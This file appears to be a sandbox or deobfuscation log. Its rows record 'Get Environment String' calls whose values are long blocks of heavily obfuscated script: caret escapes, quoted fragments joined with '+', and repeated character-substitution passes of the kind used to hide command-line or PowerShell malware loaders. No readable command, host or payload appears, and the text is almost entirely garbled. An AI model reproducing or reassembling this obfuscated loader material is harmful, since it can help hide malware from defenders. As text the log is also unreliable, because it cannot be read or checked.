e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd4WxHaxd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = `]$, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H2iy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = `-$, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = [$@+, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRIA3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQIAqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = @-, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_:H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 e:XbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = ~`?, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 eXbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = #;, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8 8 zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn 6)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le8 e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^\|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = {[, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le80eXbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y80s3Td]7y).Fl6aTd3egYgY)gYgY^^^\|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo	1	Fn
Environment	Get Environment String	name = @#?., result_out = seGC7y svTd]Fl6aK. 1 @sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7ye -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl] jh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl] qFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys80,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g90,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl] u`'+'GC7y'+'e{Pjy '+'2jUnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7 Zn10..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8080zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aE -3QI9an37 jUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8080Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{0.'+'.'+'jUn'+'90('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn06)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^& se% ajUI/`aKE,%zEhPj 1gZ Fl6aRIA3QI9le80e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11Tdjh eqFl6N7y80s3Td]7y).Fl6aTd3e ) ^^^\|GC7yyPj4ERsheZ7yElTd -nXqFl6NZqFl6N%E]a7yjUa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7e,v%IPjqFl6Nk7yPjTdI, 3QI9`GC7yyAjhjh -nPjGC7yy]PjzEhIle -7yjUaPjmuQIAqFl6N37 ^^^^^^^&1 @eqFl6N7y807yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv% ) ^&^& ,m37.e7E ,g, oa37Z/Tgo	1	Fn
